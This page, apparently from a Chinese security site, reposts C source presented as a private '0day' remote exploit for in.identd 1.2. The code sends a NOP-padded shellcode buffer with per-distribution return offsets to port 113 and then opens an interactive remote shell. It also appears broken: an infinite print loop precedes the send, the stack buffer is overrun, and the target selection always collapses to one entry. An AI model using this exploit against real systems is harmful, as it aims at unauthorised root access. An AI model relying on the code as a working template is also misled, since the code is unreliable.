首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
identd 1.2 remote exploit
来源:hacker.bob@sc.am 作者:japboy 发布时间:2005-12-23  

/*
* identd-0day.c - in.identd 1.2 remote exploit
*
* by japboy <hacker.bob@sc.am>
*
* Compile: gcc -o identd-0day identd-0day.c
*
* PRIVATE PRIVATE PRIVATE PRIVATE
* 0DAY 0DAY 0DAY 0DAY 0DAY
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>

#define COMMAND "uname -a;id;uptime;"

char *shellcode="\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x16\x31\xdb\x31"
"\xc9\xf7\xe1\x5b\xb0\x0b\x88\x53\x07\x52\x53\x89\xe1\xcd\x80"
"\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff/bin/sh";

struct os {char *name;int offset;int chunk;} oss[] = {
{
"Red Hat 8.0 (Psyche)",
0x8622067,
0x420158d4
},
{
"Slackware 8.1",
0x86f3d61,
0x420158d4
},
{
"Mandrake Linux 8.2",
0x8622079,
0x420158d4
}
};

void usage(char *a) {
int i;
printf("%s [host] [os]\n",a);
for (i=0;i<3;i++) {
printf("\t%d - %s\n",i,oss[i].name);
}
}

void sendshellcode(int sock,int ost) {
unsigned char sent[]=COMMAND;
unsigned char buffer[512];

int i,j,p,size=sizeof(buffer);
unsigned int ret;

memset(buffer,0x90,size+10); /* Fill empty space */

memcpy((buffer+size)-strlen(shellcode),shellcode,strlen(shellcode)); /* Copy shellcode last*/

/* Fill with offset */
for (i=0,p=0;i<10;i++) buffer[size+p++]-=0x88;
for (j=2;j>=0;j--) for (i=0;i<3;i++) buffer[size+p++]=((char*)&oss[ost+i].offset)[j];

/* Write to socket */
for(;;)
printf("[x] Sent: %s\n",sent);
if ((ret=write(sock,buffer,size)) < 0) {
printf("[x] Unable to send shellcode\n");
exit(0);
}
}

void sh(int sock) {
char rcv[1024];
fd_set rset;
int maxfd, n;

/* Main command loop */
while(1) {
FD_SET(fileno(stdin), &rset);
FD_SET(sock, &rset);

maxfd = ( ( fileno(stdin) > sock )?fileno(stdin):sock ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);

if (FD_ISSET(fileno(stdin), &rset)) {
bzero(rcv, sizeof(rcv));
fgets(rcv, sizeof(rcv)-2, stdin);
write(sock, rcv, strlen(rcv));
}

if (FD_ISSET(sock, &rset)) {
bzero(rcv, sizeof(rcv));

if ((n = read(sock, rcv, sizeof(rcv))) == 0) {
printf("Good Bye!\n");
return;
}

if (n < 0) {
perror("read");
return;
}

fputs(rcv, stdout);
fflush(stdout); /* keeps output nice */
}
} /* for(;;) */
}

int main(int argc, char **argv) {
int sock;
unsigned int ost,ret;
struct sockaddr_in in;
struct hostent *hp;
if (argc <= 1) {
usage(argv[0]);
exit(1);
}
ost=atol(argv[2]);
if (ost > 2) ost=2;
if (ost > 0) ost=0;
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
printf("[x] Error creating socket\n");
exit(0);
}
if (inet_addr(argv[1]) == 0 || inet_addr(argv[1]) == -1) {
if ((hp = gethostbyname(argv[1])) == NULL) {
printf("[x] Error resolving host\n");
exit(0);
}
bcopy((char*)hp->h_addr, (char*)&in.sin_addr, hp->h_length);
}
else in.sin_addr.s_addr=inet_addr(argv[1]);
in.sin_family = AF_INET;
in.sin_port = htons(113);
printf("[x] Trying to connect\n");
if ((ret=connect(sock, (struct sockaddr *)&in, sizeof(in))) < 0) {
printf("[x] Error connecting to host\n");
exit(0);
}
printf("[x] Connected....\n");
sendshellcode(sock,ost);
sh(sock);
return 0;
}

// Bulgarian DarkNet [200x]
// http://DarkNet.pH/



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GKrellM Vulnerable to Remotely
·PHP-Fusion 6.x rating Paramete
·wu_ftpd <=2.6.1 remote root
·Veritas Storage Foundation VCS
·samba-2.2.8 < remote root e
·phpBB <= 2.0.17 signature_b
·GoldenFTPd APPE Stack Overflow
·Microsoft IIS Malformed URI Do
·Mailenable Enterprise Examine
·Microsoft IIS Malformed URI Do
·Macromedia Flash Media Server
·PlanetFileServer DoS
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved